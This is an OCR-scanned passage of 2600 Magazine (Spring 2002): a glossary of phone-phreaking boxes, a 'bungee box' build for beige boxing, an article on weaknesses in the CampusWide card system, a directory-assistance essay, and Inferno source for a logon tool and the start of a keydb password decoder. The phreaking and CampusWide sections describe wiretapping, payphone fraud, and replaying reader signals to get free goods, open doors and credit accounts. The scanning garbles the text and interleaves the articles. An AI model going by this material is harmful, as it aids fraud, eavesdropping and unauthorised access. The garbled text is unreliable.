ine Box, which is a different box). It allows you to 
make recordings from a phone fine, and it will 

| only record once the victim’s phone ts picked up. 
It's like a Neon Box combined with a Beige Box. 

Tan Box (2) (it's not the short name of the Tan- 

gerine Box, which is a different box). lt serves as a 
| phone ringer. You have two choices for ringers: a 
piezoelectric transducer (ringer) or a standard 8 
ohm speaker. 

(Tanger Box) (short name for the Tangerine 
Box). See Tangerine Box. 

Tangerine Box (can be shortened as Tanger 
‘Box. Can't be shortened as Tan Box, which is a 
different box). Enables you to plug it in, then listen 
ito the conversation, without them hearing a click 
or anything... plus a jack for headphone, or tape. 
| By Happy Harley, 

(fap Box) (another name for the Lunch Box). 
See Lunch Box, 

[Three Box] |similar to Brown Box, Party 
Box, Con Box]. Use one line, another line, or both. 
| Like a Con Box, but better because it uses LEDs 
for which line you are on. 

Tron Box [similar to Power Box]. It will put a 
reverse phase signal on the line and cancel out the 

| other phase and put a reverse phase signal running 


everything in the house. It should make the elec- 





tric meter run backwards. Not a phreak box. By | 
Pure Evil. : 

Urine Box (aka Zap Box). lt basically creates a 
capacitative disturbance between the ring and Up 
wires in another's telephone headset. By Wolf- 


gang von Albatross ef the Underground Elite. | 


Date: March 2 1986, 

V-Box. Detect voltage changes in phone lines 
(used for taps). 

Violet Box. This box allows calls to be made 
from payphones with just one coin, keeping the 
line from being released when time is up. The au- 
thor was going to call this the "Yellow, Violet and 
Brown Box" but then decided that name was too 
long so he stuck to just violet because it sounded 
nice. By The Kez. | 

White Box. Turns a normal touch tone keypad | 
into a portable unit. This kind of box can be com- 
monly found in a phone shop. 

[White Box (2)/ |similar to Crimson Box, 


Green Box (2), Orange Box, Hold Box, Hold On | 


Box, Yellow Box (2)|. A hoid button. See Crimson 
Box. 

White Gold Box. A White Box and a Gold Box] 
combined. Created by The Traveler. 

Yellow Box. This box can switch a pay ob 
from working to out of order and vice versa. By! 
Captain Hook. Date: February 3 1986 - 5:47. 

[Yellow Box (2)] [similar to Crimson Box, 
Green Box (2), Orange Box, Hold Box, Hold On 
Box, White Box (2)]. A hold button. See Crimson: 
Box. 

(Zap Box) (another name for the Urine Box). 


See Urine Box. The scheme and description is the] 
same for the urine box, but it’s attributed to an-} 


other author. By KiLLgOre Tr out [BULgel. 
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he Bungee Box 


by Captain B 

The principal and construction of this box is 
quite simple, You're modifying a phone handset 
cord for use as a line cord. All you will need for 
making this is a wire cutter (or wire cutter/strip- 
per) and modular crimp tool. Radio Shack sells 
both, but you can also find the modular crimp tool 
at other places that sell phones and phone acces- 
sories. Radio Shack sells two different modular 
crimp tools. The only difference is that the 
cheaper one ($9, m) has no wire cutter and only 
crimps RJ11, 14, and 25 (one, two, and three line) 
modular plugs. Tes more expensive one ($29.99) 
has a built in wire cutter and also crimps plugs on 
RJ45 (four line) modular plugs. As long as you 
have a wire cutter, you don’t need to drop $30 on 
the more expensive crimp tool. 

lt should be noted that some phone handset 
cords have four conductors inside, while others 
have two. But unless you're going to use a two 
line phone, the cord won't need to have more than 
two conductors. Take a phone handset cord and 
look first at the little wires in the plug to observe 
lor the color scheme (thus making note of the cor- 
rect polarity). Then cut off that handset cord plug. 
You could do both at once, but you might lose 
track of the correct polarity. To simplify, do one 
end of the cord at a time. Try to cut off the plug as 
close as possible with where it connects te the 
cord, Take a two line (RJ14) modular line cord 
plug and crimp it on the handset cord facing the 
same way as the previous handset cord was. (In 
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other words, if the little spring clip on the handset 
cord was facing down, crimp the line cord plug 
on facing the same way as that was.) To crimp, 
first push the line cord plug over the end of the 
handset cord as mentioned, then insert that end of 
the handset cord into the modular crimp tool 
properly, and squeeze the handles together firmly 
until it stops (which is quite fast), See the instruc- 
tions that came with the modular crimp tool if 
you need more help. 

After crimping a line cord plug on one end of 
the handset cord, you have only to repeat the 
same process for the other end of the handset cord 
and you're done. If you messed up on the polarity 
at either end, it Should still work, but keeping po- 
larity correct is the right way. As long as you're 
careful and work patiently, it's a piece of cake. 

I think the bungee box is great for beige box- 
ing purposes, because when phreaking out in the 
field, you don’t want a tangled mess of line cord 
to have to disconnect and store away when you 
have to get out of the scene in a hurry. It should 
be mentioned that another way to accomplish this 
is to use a retractable line cord. It comes in its 
own circular case, These can be bought either 
from Radio Shack for $19.99 or Home Depot for 
about $15. The one from Radio Shack is 12 feet 
long, the one from Home Depot is 16 feet long 
(according to the packages). Have phun. 

All credit for the name of this box goes to icOn 
of LPH. 








by Acidus 
CampusWide is the mostly widely use 
access system in America today. It sadly {is the 


least secure. CampusWide is an ID card sdtutren——— 


originally created by AT&T and now owned by 
Blackboard. It is an ID card that can be used to 
purchase things from vending /laundry machines 
or the college bookstore just like a debt card. It’s 
used to check out books from libraries, open com- 
puter labs and buildings at night, gain access to 
parking decks, and even get you into sporting 
events. The Campus Wide system gives everyone a 
card that lets them access both unattended and at- 
tended card readers and Points of Sale. All these 
actions and transactions are sent to a central server 
which stores all the information in a database. A 
confirm or deny signal is sent back to the card 
reader. 

Back in the day (last ten years), there were two 
major card systems available to colleges: AT&T's 
Campus Wide system (also known as Optim9000) 
and Icollege’s Envision, Enviston was one of the 
first card systems ever made. The seeds of the cur- 
rent Envision system go all the way back to 1984 
with a company called Special Teams. The original 
engineers from Special Teams went through sev- 
eral companies, each one being bought by another 
company every year for several years, before they 
came to Icollege. AT&T saw the market for card 
systems and jumped into the mix as well, stealing 
some of the ideas behind the system by hiring de- 
velopers of Envision away from Icollege. They re- 
leased a system known as CampusWide. It is 
commonly called Optim9000 or OneCard, how- 
ever I will continue to call it by its most well 
known name, Campus Wide. So why do you need 
to know all this history? Because the core of all 
modem card systems is based entirely on 1984 
technology! The original engineers from Special 
Team and people trained in their ideas have been 
the only people in the country designing and build- 
ing these things. That means that the weaknesses 
in the reader/server infrastructure that I point out 
here are found in every card system made in the 
United States in the last 15 years! By the mid to 
late 90's CampusWide held the largest market 
share. Then in November 2000, a newly formed 
company called Blackboard purchased both Envi- 
sion and Campus Wide, It sells both systems under 
the names Envision and Optim9000, Blackboard's 
first order of business was to upgrade the two sys- 
tems to use newer technology, only to learn that 
they couldn't! Too many colleges and even busi- 
nesses had the older equipment and Blackboard 
couldn't afford to drop compatibility! They have 
tried to merge older and newer technology in an at- 
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Tape and a UPS that could keep the E up for 


tempt to improve oido (with the addition of IP 
r; Ptheyl have weakened an 
already frail system, 
15 the most prevalent, 
and easy to Spot, The dps are black metal or 
plastic, almost all have an LCD screen, and they 
have no writing on them except for the AT&T logo 
with the word "AT&T" under it. The newer Black- 
board ones work exactly the same as the AT&T 
ones, Only they have Blackboard written on them 
Information on the CampusWide system was very 
hard to find. I started looking right after AT&T 
sold it when they were clearing out their old web- 
pages and Blackboard was still creating their web” 
pages. Needless to say, AT&T had much better 
documentation of the specs of the system than’ 
Blackboard does, Sadly, all of it is off AT&T's” 
page pow and you'll have to hurry to still find it 
cached on Google. Luckily | saved everything, and 
should post it up soon. 
The Server 
The CampusWide system is recommended to) 
run on HP9000 machines, though any RISC! 
processor will do. It only runs on HP-UX (Black 
board currently installs ver 11.x). The AT&T sys- 
tem had a list of specs that the end users had tal 
have to support the software. These included the 
above, but also a four gig capacity Digital Audio” 

































minutes). More interesin aiy, the ek 


system is required to have a 9600 bps modem for 
remote diagnostics. The system itself consists of 
two parts: The Application Processor (AP) and the: 
Network Processor (NP). The Application Proced 
sor is the back end of CampusWide, the part the T 
users never see, lt manages the database where alli 
the information is stored and provides an interface 
for human operators to look at logs and run re- 
ports, as well as change configuration/privileges” 
and transactions/account maintenance, The NP is” 
the gateway from the infrastructure to the AP. ho 
takes in the requests from readers around campus, — 
converts the mode of communications mto com- 
mands the AP can understand, and then passes it 
along. AT&T CampusWide could support up 60 
communication lines and 1000 card readers. The ` 
new Blackboard system allows up to 3072 readers. 

The Database 

All the information about a student or em- 

ployee isn’t stored on the card for security reasons, 
t's stored in the database (the card simply has an 
account number which is used to organize the data 
in the database). The database used by the current 
anida aan is dbVista. The database for the 
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AT&T version was never advertised by AT&T but 
was believed to be Informix. However, based on 
the modular design of Campus Wide, | believe any 
SQL queried relational database should work. The 
database is most likely not encrypted or protected 
in any way other than by isolation. The only way 
to get to it is either at the console of the AP or by 
the commands sent from card readers that have al- 
ready passed through the NP. Blackboard’s as- 
sumption that these two ways of reaching the AP 
are secure Is one of the system’s downfalls. The 
database can store up to 9.999 different accounts, 
each account having many different fields. The 
balance the person has and the doors he can open 
are included in the system. The balance will be a 
floating point number, and the doors the person 
can open will most likely be a string of characters, 
with the bits being used to tell which doors he can 
or can't open. The doors are most likely grouped 
into zones, so that the five doors into a building 
have one bit instead of five separate bits saying 
whether the person can open those doors or not. 
This idea is upheld by the fact that Blackboard 
Says the users are given plans and they can be up- 
dated regarding their access to buildings. These 
plans grant different levels of security access to a 
building. Lower levels can get into the building 
through all the exits, the next level can access labs 
on a certain floor, etc. Without direct inspection of 
the database, only educated guesses can be made 
about its structure. (I have totally left out any pro- 
visions for checking out books and other things the 
card can do.) 
The Workstations 

The AP was interfaced originally by the AT&T 
system only at the server console, or through dumb 
terminals connected to 19,200 bps serial lines. To- 
ward the end of the ATAT days and now with 
Blackboard, changes to someone's security privi- 
leges can be made from any workstation on cam- 
pus. | watched this process several times. A certain 
software package was used to connect through 
TCP/IP to the AP. (I saw the name once, briefly, 
and for some reason 1 thought it was Osiris. 
Checking on this name has turned up no results. 
Perhaps this is a proprietary piece of software spe- 
cific to my college, or simple a closely guarded 
software package from Blackboard.) A GUT was 
used to select my name from a list of students. A 
summary of my security privileges then came up, 
and the ability to add and remove these was there 
as well. This GUI was incredibly user friendly, as 
the man using it had nil computer knowledge. I 
only got to watch a few people having new secu- 
rity privileges activated, and never got to use it 
myself, so I haye no way of knowing if the debt 
balance can be accessed/changed from this GUI. 

The Card 

The ID cards that are used are your standard 
ANSI CR-50 mag stripe cards. They are made of 
PVC and are 2.125 by 3.375 inches. They are 
made on site at the college's “card station,” and 
normally have a photo ID on them. A 300 dpi 
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photo printer is used and the company recom- 
mended by Blackboard is Polaroid (just like the 
printers at the DM). The magnetic stripe on the 
card is a Standard American Banker Association 
(ABA) Track 2. Any card reader/capture tool can 
read these cards. The cards are encoded on high 
Coercivity stripes (known as HiCo), which are 
very resistance to wear and tear. These cards only 
use Track 2 of the card which is read only. It 1s in- 
teresting that they don't use Track 3 which is 
read/write. Track 2’s information breakdown is as 
follows: 

Start Sentinel = I character 

Primary Account Number = up to 19 characters 
Separator = 1 character 

Country Code = 3 characters 

Expiration Date or Separator = / or 4 characters 
Junk data = fills the card up to 40 characters 
LRC (Longitudinal Redundancy Check = | char- 
acter 





The card dy the property of WR ROM TOWN Uranio, 


(a Ae io ot O DLS een Coed Motes 
USA 1703 


As you can see, most of this applies to banks. 
However, the account number I have stamped on 
my Campus Wide card is 16 characters long, so the 
Primary Account number field is known to be 
used. CampusWide also allows for lost cards. H a 
card is lost, an entry is made in that person's table 
in the database, the last digit of the account num- 
ber is increased by one (this is called the check 
digit - so of the 16 digit account number I have, the 
first 15 digits are my number; the 16th digit 1s the 
check digit). The old card that uses the old check 
digit is deactivated and a new card ts printed. 

The Infrastructure 

The infrastructure is a "security through obscu- 
rity" ploy of the system. Originally the system was 
designed to run over several RS- 485 drop lines. 
(These are the 60 communication lines mentioned 
before.) RS-485 is a very robust means of trans- 
mitting data. (The whole CampusWide system is 
designed to take a beating.) Unlike RS-232, which 
has a protocol built into the standard that says how 
devices must talk to each other (stop bits, baud, 
handshaking, ete.), RS-485 has none of that, It is a 
way for a master device that sits at the end of a 
communication line to talk to slave devices that 
are daisy chained on the line. The CampusWide 
system uses the full duplex version of RS-485 
where slaves can Speak to the master before the 
master polls them for data, (CampusWide needs 
this to have the sub-seconds times they advertise. 
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However, the NP still polls all the readers on a reg- 
ular basis and can be interrupted by a reader when 
a transaction comes in.) The data lines are very ro- 
bust against noise and interference. R5-485 has 
two lines in each direction, called A and B. Data is 
sent by having a difference tn the voltage of A and 
B of more than five volts. This mean that if you 
have a signal being sent and A is at 10 volts, B is at 
15, and a power spike comes along, the spike will 
boost borh voltages by the power of the spike. 
However, the difference between the higher power 
A and B will sull be five volts and the data is not 
corrupted, Over short distances, speeds of 10Mbit 
can be achieved. However, the longer the cable is, 
the lower the speed. All Campus Wide card readers 
operate at 9600 bps, thus making the maximum 
distance of the RS-485 drop line 4100 feet at that 
speed. This can be extended through the use of re- 
peaters and boosters on the line, RS-485 is very 
common in the industry, but “secure” at a college 
since it is unlikely anyone would have a means of 
interfacing to it, Commercial RS-485 to RS-232 
converters are available and prices range from $50 
to a few hundred. VHDL designs of these converts 
can be found on the Internet, and thus an FPGA 
could be configured to decode RS-485 signals. 
While researching I came across a post from some- 
one claiming to be a field tech for some company. 
He said that you could make an RS-485 to RS-232 
converter very easily by wiring: 

RS-232 Xmit = RS-485 RX 

RS-232 Rvcd = RS-485 TX 

No one posted after him to say he was wrong. I 
don’t know if it would work, since the second wire 
of the pair of RS-485 data lines isn’t even men- 
tioned, and it’s the difference between these two 
lines that sends the data. Also, the possibility of 
high voltage on an RS-485 line could easily dam- 
age a serial port on a computer, if not fry the moth- 
erboard. Also, this assumes the data scheme used 
to transmit data on the 485 line is identical to RS- 
232. This doesn't have to be true, since the way 
data is represented (in packets, streams, stop bits, 
parity, etc.) is not defined by RS-485. If you could 
get to the data streams, you have no idea what the 
scheme used to represent it is, and thus how to de- 
code it. This last problem however, is moot, as you 
will read in the Exploits section. 

AT&T would recommend that these lines be 
used (indeed all the readers can only transmit their 
data in RS-485 mode), however the data can travel 
over any facility from telephone lines to radio 
waves, provided that full duplex 9600 bps asyn- 
chronous communication can occur on them. The 
NP is the part of the system that would sort all this 
out. AT&T did however specifically say that using 
an existing Ethernet or computer network was not 
a good idea, as it sent the data out into the wild, 
and would slow down both the CampusWide sys- 
tem and the existing computer network. However, 
Blackboard now offers an IP converter. This de- 
vice is a simple computer (it has a Pentium class 
processor and a standard off the shelf NIC Card) 
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that takes in 16 different RS-485 devices, converts 
all their communications into TCP/IP packets, and 
encrypts them to send over the network. The NP 
then has a converter at its end that converts the 
packet back to RS-485 format. The IP converter is 
assigned an IP address which is most likely a static 
address. The IP converter also most likely has a 
daemon on it you can telnet into to look at the sta- 
tus and perhaps change configuration info. Black- 
board says the data from these boxes is encrypted 
and the box certainly has the power to crunch 
some numbers. However, | have found that if en- 
eryption is good, then companies will brag that 
about the key length, etc. The only data Black- — 
board gives about the encryption is that the keys — 
can be changed automatically at any interval from 

the AP. 

For the longest time at my college if an off- 
campus food joint wanted to have the student be 
able to use their school cards to pay for food, they ` 
had to pay for an expensive leased line that con- 
nected them to the school. Its my guess that this 
was the RS-485 line or something similar. Re- 
cently (in the last six months) my college offered 
cheap (less than $300) boxes to nearby pizza joints” 
that would allow for payment with a school card. 
These boxes were simply card readers with” 
modems installed, much like a credit card valida- 
tor. These modems are dialing the NP directly 
Major security risk! 

The infrastructure ends up like this. All the dē- 
vices in a building send their lines into one place in 
the building. This is where multiplexers ne 
which split the main RS-485 drop line up inte 
slices for each reader. These multiplexers also can 
boost the power of the main drop line, eating i 
travel longer distances. They can be stored in 
locked networking closet or in these big metal cab- 
inets on the wall of a room. AT&T called t A 
MW/MHWMENC - Wall Mount Enclosures. Th K 
metal box has a handle and a lock, but the front of 
the handle and lock assembly has four flathea 
screws. I used a ce metal Knife and opened this 
locked box. Inside I found the LCM (Laundry | 
Center Multiplexes) that controlled the laundry] 
room I was in. Everything had "AT&T Cam: 
pus Wide Access Solution” written on it, as well 4 
lots of Motorola chips. Sadly, this was early in my | 
investigation, and I haven't gone back to look 
again. I 

The drop lines coming to the building can be- 
traced back all the way to the building that houses 
the NP, There the NP interfaces wath the AP to ap- 
prove or deny transactions. 4 

The Readers | 

Every reader imaginable is available to a col- 
lege from Blackboard. Laundry readers, vending f 
machine readers, Point of Sale (POS) terminals in 
the campus bookstore, door readers, elevators, 
copiers, football game attendance, everything!!! 
All of the readers communicate using RS- 485 
lines, and if any other medium is used between the: 
reader and the NP (such as TCP/IP networking by 
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way of the IP converter), it must be converted back 
to RS-485 at the NP, since all CampusWide uses 
that standard. Everything is backwards compati- 
ble. The majority of my college campus has AT&T 
readers on them, though a few new Blackboard 
readers are showing up. 
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Readers can be broken into three categories: 
security, self vending, and POS. 

Security readers are made of high density plas- 
tic and consist of a vertical swipe slot and two 
LEDs. They are green when they are not locked 
and red when they are. When you swipe a card to 
open a door you are cleared for, the light will 
change to green for around 10 seconds, If the door 
has not been opened in that time, it locks again. To 
allow for handicapped people who may not be able 
to get to the door in time, a proximity Sensor is 
available to receive signals from a key source to 
open the door, Information about what frequencies 
are used to control the door are obviously not pub- 
lished by either AT&T or Blackboard. There is also 
a model of door reader with both a swipe and a 0-9 
keypad for codes. | have encountered no such 
model and have no idea how it works. Advanced 
forms of these three security readers are available 
which have the ability to have a local database of 
4,000 (expandable to 16,000) account numbers 
stored in NV-RAM. This way if for some reason 
the card reader can't reach the NP to confirm 
someone's identity, then the reader can check its 
local records. The tricky bastards also built the 
readers so there is no visible difference between a 
reader that can’t reach the NP and one that can. 

The self vending machines are the most color- 
ful group. They are the best to hack because they 
are unattended and work 24/7. They vary in size 
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and shape, but all have several fundamental fea- 
tures. They all have an LCD screen of some kind, 
the most common being 2x16 characters. Most are 
mounted to walls and the power/data lines are pro- 
tected by metal conduit. Coke readers are mounted 
on a Coke machine where the dollar bill acceptor 
would go. Of this group one stands out: the Value 
Transfer station! Unlike the GUI at the worksta- 
tons, this reader can directly query about the ac- 
count balance of the cardholder and add money to 
it as well (by feeding in dollar bills like a change 
machine). In addition, it dispenses temporary PVC 
cards that can be credited, so people can do laun- 
dry, etc. if they forget their card. This means that 
this station can tel) the AP to create a new account 
and give it x number of dollars! 

Finally there are the POS devices. A student 
would never get to use these. They are used in 
cafeterias and bookstores. They allow for payment 
by the student [D card and several other options. 

All these readers have inherent similarities. 
Most are made from high impact plastic or metal. 
If it is wall mounted, there will be metal conduit 
running out of the top which holds the power and 
data lines. All have their program code on 
ROM/NV-RAM chips. I once managed to power 
down a card reader for a copter. When | turned it 
back on, it ran through several self tests in the span 
of a few seconds. | saw messages on the LCD that 
said things like "ROM ver" and "CRC check com- 
plete." AT&T and now Blackboard say all the read- 
ers, mcluding POS, will power up to full operating 
status without any user input in a maximum of 20 
seconds. All of these readers can store swipes of 
cards and transactions in their local NV-RAM until 
it can reach the NP, and through it, the AP to con- 
firm the transaction. While disconnected from the 
NP, the readers show no warning lights or anything 
like that, Some readers, such as the security read- 
ers, can be wired to a UPS to keep areas secure 
even when the power goes out. 

A Simple Transaction 

Let's run through a simple transaction, | am ata 
laundry reader. I tell the reader with a key pad 
which washer I want to use, Let's say I choose C4. 
I then swipe my card. The reader sends a signal 
that contains the account number (and the amount 
of my purchase and most likely nothing more) to 
the NP through some medium (most likely it’s a 
straight RS-485 line, but an IP converter could be 
installed by the university). The NP decodes the 
data out of the RS-485 line and parses it into com- 
mands the AP can understand. The AP uses the ac- 
count number to pull up my account and checks 
the balance against the amount requested. lt then 
either deducts the money from my account and 
tells the NP to send an OK signal, or to send a deny 
signal along with the new balance of my account. 
The NP forwards the reply back to the reader, and 
the reader (if it got an OK signal) sends an elec- 
trome pulse to the coin tester inside the washer C4 
and tell it that 3.50 was received. The washer is re- 
tarded - for all it knows I put 4.50 in it with coins, 
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and it gives me a load. 
The Exploits 

Did you see the problem with the above scenar- 
ios? There are several ways to cheat the system. If 
I can record the "it’s OK to sell it to him" signal 
from the NP to the reader-and play it to the reader 
again, I will get another load of wash. Also, if I 
could get to the wires that go from the Coke reader 
to inside the Coke machine that send the coin 
pulses, I can make the Coke machine think money 
has been paid. I have looked at Coke machines 
with these Coke readers. Out the back of them they 
have an RJ11 jack (though it will have RS-485 sig- 
nals on it). All I need is a converter and a laptop 
and | can trap the signals back and forth between 
the reader and the NP. You don’t even need to 
know what the data scheme used on the RS-485 
line is, just send to the reader what you intercepted 
from the NP, and it will work. It is even easier if 
the traffic takes place over a TCP/IP network. If 1 
learn the IP address of the IP converter, | can sim- 
ply send packets to it from anywhere in the world 
(provided I can telnet into the college’s TCP/IP 
network) that contain the R5-485 code to spit outa 
Coke! You can fool door readers as well if you can 
get to the wires that go from the reader to the mag- 
net holding the door shut. Just send the correct 
pulses. This system is horribly insecure because 
you can completely bypass the Campus Wide inter- 
face! The Value Transfer Stations are even worse. 
They have the ability to make the AP create a new 
account and set a starting balance of any amount. 
Just gain access to the RS-485 lines, record the 
traffic to and from the NP while you are getting a 
temporary card, and you have the system to create 
and alter debt accounts. 

With a system like this, you would think that 
the RS-485 lines would be protected with massive 
security. They aren't. Metal conduit protecting the 
lines commonly stops at the hanging ceiling. Value 


by The Cheshire Catalyst 


cheshire @ 2600.com 

The people running telephone companies (tel- 
cos) are such idiots. Sorry, | really should explain 
which idiots I’m talking about since there are so 
many entities known as "phone companies” out 
there these days. In this diatribe I'm referring to 
the LECs, or Local Exchange Carriers - those 
phone companies that handle "the last mile" from 
the telco’s central office to your home. LEC’s are 
broken up into ILEC’s and CLEC'’s (Incumbent 
Local Exchange Carriers and Competitive Local 
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Transfer Stations routinely have their backs acces- 
sible from janitor or utility closets, which are 
rarely locked. The 485 line literally comes out of 
the back of a coke machine unprotected. The flexi- 
ble piping that carries the coin wires from the laun- 
dry reader to the washer are secured to the back of 
the washer with flat head screws. It is pathetically 
unprotected, The phone numbers the modems dial 
from off campus eateries are easily socially engi- 
neered out of the minimum wage workers there, 
and they let you dial directly to the NP. Or you 
could simply find the range of telephone numbers 
of the building that the card system is housed in 
and wardial it. The AP is required by Blackboard 
to have a modem for diagnostics. You could steal a 
copy of the GUI of a computer and then edit peo- 
ple's privileges to your heart's content. And even 
worse, the Envision system is exactly the same as 
CampusWide, except it uses a Windows NT/2000 
machine using Oracle as its database: Every flaw I 
mentioned will work against Envision as well. 
Hell, both systems even use the same readers! And 
there is no fear of having any of your actions 
logged. Once you trap the RS-485 signals from the 


NP to the reader, just play it back to the reader — 


whenever, The AP never knows you are doing any- 


thing and thus doesn’t log it, and the reader as- 


sumes that any data it gets must be secure. Now 
tell me this, The next time you swipe a Cam- 





pus Wide card to get into a football game, how do 


you know someone isn’t trapping the data and crè- 


ating a copy of your account onto a card from a` 


hacked Value Transfer Station? Hopefully this arti- 


cle will force Blackboard to change to a more sée- 


cure system. 


Thanks to Jim at Blackboard for all the techni- 


cal info, and various websites like rs485.com, 
google.com's cached webpages, and howstuff- 
works.com. 


Exchange Carriers}. The "Incumbents" are the} 
guys who were around since before the breakup} 
of AT&T, while the "Competitives" are the new 
guys on the block who are supposed to help keep} 
the old guys "honest" and force them to keep rates} 
competitive. The guys who carry your conversa-| 


tions as a long distance call are IXC's (IntereX-|_ 


change Carriers). 
As an old "phone phreak,” it’s almost embar- 


rassing that I should have to admit that my "day | 
job" is that of a Directory Assistance (DA) opera- | 
tor for a major Long Distance Carrier (IXC). It} 
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‘doesn't matter which one because | don't really 
work for them anyway, In these modern days of 
deregulation, | work for a third-party outfit that ts 
hired to provide the DA service cheaper than they 
can do the job in-house. That's because I live in 
one of the numerous "Right-To-Work" states in 
the nation’s sun-belt, and get paid pittance. 

One of the major embarrassments of my job 
happens When someone calls for the local phone 


¡company - not just in a small town, but even in 


major cities! The phone company never puts itself 
in the directory so it can be found! And of course, 


T only handle White Pages. If the caller doesn’t 
iknow the name of the telco, Um not allowed (by 


FCC tariff, I'm told) to provide.a "Yellow Pages" 


}search. | keep threatening to take some vacation 


lime to visit the reading room of the FCC in 
Washington some time and look this stuff up. but 
I really can't afford the trip (see comment on 
| "Right To Work” state above), 

Since Í cover a number of states in my job, | 
get to look at the listings of a number of major 
LEC’s. Verizon will have "Verizon Wireless" list- 
ings for every hamlet and burg in the nation - but 
try to find a number for residential land-line ser- 


vice that an out of state caller can ring up to see 


about the problem with Aunt Minnie’s account 
back home, and I’m up against the tariff asking 
"Do you know the name of the phone company in 
that area?” Even when I break down and suggest 
that Verizon is the primary local carrter in Boston, 
or Ameritech in Chicago (hoping that this isn't 
one of the calls being “monitored for Quality As- 
surance"), just what number am I supposed to 
supply? Deregulation began in 1986 with the 
Modified Final Judgment. Here 1 am in the next 
century wondering what I'm supposed to tell a 
customer who's on their third call to Directory 
Assistance looking to get a phone account 
squared away! 

People call in with the most compelling stories 
about how their elderly aunt back home in 
Chicago or Boston can’t deal with their phone 
company any more, and they need to call and take 
care of the charges. Or somebody in the Rust Belt 
up north is trying to reach the telco of their winter 
home in the South to deal with a problem on their 
bill. Itisn’t that I've got the time to stop and listen 
lo their stories, it’s that I can’t shut them up while 
trying to search the many recurrences of the Di- 
rectory Sales Office numbers while trying to find 
a listing for an out of state caller to call, 

The trick here is that the phone companies 
have all their information about contacting them 
packed in the front pages of their local telephone 


| directories. In over 15 years of deregulation, it 


¡the ones they keep passing in the hails of the Pub- 


hasn't occurred to most of them to advertise in 
their own Yellow Pages under "Telephone Com- 
panies" or to put in as big a listing in the White 
Pages as their Electric Company utility brethren - 


Spring 2002 





lic Service Commission offices but never need to | 
talk to. Keep in mind that the telephone book pub- 
lishing arm of those same phone companies have 
been "spun-off” so the right hand really doesn't 
know what the left hand is doing - because it isn't 
its own left hand any more! | 

The other problem is when callers call out of | 
state DA at NPA-555-1212 (NPA is “Numbering | 
Plan Area," the telcos’ in-house term for "Area 
Codes"), the White Pages listings are never clear 
as to where an out-of-state caller should call about 
discussing a bill. Actually, I should compliment | 
BellSouth here. They actually do have a specific 
number for out-of-state callers to dial. Let me tell 
you why. 

The number in most BellSouth states to reach 
the telco for residential customers is 780-2355 
(780-BELL). It's always a local number wherever 
you call from, and if you live in an area that has 
|0-digit dialing, you have to use your area code in 
front of that number to get there. The number is | 
never good from out of state, but most of my “col- 
leagues" in the Call Center don't know this and 
give it out - causing much frustration when the 
caller calls back to complain and get a good num- 
ber. It’s a toll free number, and clearly marked | 
“out of state" but most callers don’t want the "Toll 
Free Number Runaround.” They want a “direct 
number," then get the recording that the number 
in the 780 exchange is not valid. | 

So how does a telco go about changing the 
listings in the directory database that I (and my 
600 friends in my call center) use every day? Do 
what we tell people who call wondering why their 
number isn’t in our directory: "Call your Local 
Phone Company, and make sure they have your 
listing correct, Our information is updated from 
the information that they provide to us." 

So there it is. Get with it, you telcos! Get your 
act together and pretend you're "just another 
American company.” Even you need to check 
your company’s telephone book listings once in a 
while. Make sure your customers can find you 
when they call Directory Assistance, whether 
they're in town or across the country - just like} 
every other company has to. Otherwise, your cus- 
tomers will go to that CLEC across town. Usually, | 
they can be found in the Phone Book! 








Regrettably, we left out the source for two utilities that went 
| along with last issue's article on the Inferno operating sys- 


tem, We apologize for the omission and include them below: 


wove ><] NB -  —__—_—— = 


# clogon 
# port of wm/logon to the command line 
# 

E dalai(dalar@swbt.net) 

| # http www. swbtnev-dalal 


implement clogon, 


include "sys. mm"; 
ays: SYS; 


| include “draw.m"; 


include "sh.m": 
include "newns,m"; 


| clogon: module 


init: fn(nil: ref Draw-<Context, argv: list of string 
hi 


init(nil: ref Draw-<Context, argv: list of string) 
|i 
sys = load Sys Sys- FATH; 
sys-<print("clogon, by dalai(dalai@swhbt.net)in"); 


sys-<petl(sys-<FORKMS|sys-<FORKEFD, nil); 


progdir i= “#p/" + string sys-<petl(0, nil); 
kid := sys-<open(progdir+"/etl", sys-<OWRITE); 
if(kfd == nil) | 
sys-<sprint("cannot open Ss: Ser". progdir+"/etl"); 
sys-<raise("fail:bad prog dir"); 
| 


pr"; 
iflargv != hil} | 
argv = argv: 
iffargv != nil &é& hd argy == “-u") |. 
argv = tl argv; 
iffargy '= nil) { 
ust = hd argv: 
argy = tl args; 


if (usr == nil || logontusr)) | 
sys-<print("usage: elogon -u usen”); 
| 


(ok, nil) := sys-<stat("namespace"); 


if(ok <= 0) | 

ns i= load Newns Newns-<PATH: 

tías == nil) 
sys-<print( "failed to load namespace builder\n"); 

else if ((nserr == ns-<newns(nil, nil)) != nil) 
sys-<print( "error in user namespace file: 9s", nserr); 
sys-<printC la"); 

| 


| 
sys-<fprint(kfd, "killgrp"); 
errch := chan of string, 
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| mounted on this 


spawn exec(argy, errch); 
er = >-errch; 
if (err != mil) { 
sys-<fprintisiderri), “logon: Obs\n", err): 
sys-<raise( "failexec failed”); 
| 
| 


exectarev: list of string, errch: chan of string) 
¡ ; 
sys-<potkisys-<NEWED, 020102 2 nil); 
e i= ref Sys-<Exception; 
if (syvs-<rescue("fail;*", e) == Sys-<EXCEPTION) { 
sys-<rescued(Sys-<ONCE, nil): 
exit, 


| 


argy = “/dis/sh/sh.dis” :: "4" x "n" 1 mil; 
cmd := load Command hd argv; 
if (cmd =nil) | | 
errch >-= 5y5-<sprint( "cannot load Sos: Gor", hd argv); 
} else | 
errch >= nil: 
emd-<init(nil, argv): 
| 
| 


logontuser: string) int 
| 

userdir := "ust +user; 

if(sys-<chdir(userdir) >()) | 

sys-<print( "There is no home directory for that user 

machine"); 

return O; 
| 


# 

# Set the user id 

# 

fd := sys-<open("/dev/user", sys-<OWRITE]; 

if(fd == nil) | 
sys-<print( "failed to open Adev/user: Gorin"); 
return U; 

| 

b := array of byte user; 

ifisys-<write(fd, b. len by > Q) | 
sys-<print("failed to write /dev/user with error: Sorin"); 
return 0; 


} 


return 1: 
| 
stderr(): ref Sys-<FD 
| 
return sys-<fildes( 2); 


+ hellfire.b : /keydb/password decoder 
it 


# by: dalai(dalai@swbtnet) 
# httip://www.swbtnet/—dalai 








er 


2600 Magazine 


ea A A Imela i 








implement hellfire; 


include "sys.m"; 
sys: Sys; 
include "draw.m"; 
draw: Draw; 
include “bufie.m"; 
buño: Butio; 
lobuli import butio; 
include "string.m"; 
str: String: 
include "arem": 


arg: Arg: 

¡include "keyring.m”; 
keyring: Keyring; 
include "secunty.m': 
pass: Password; 


hellfire: module 

t. 

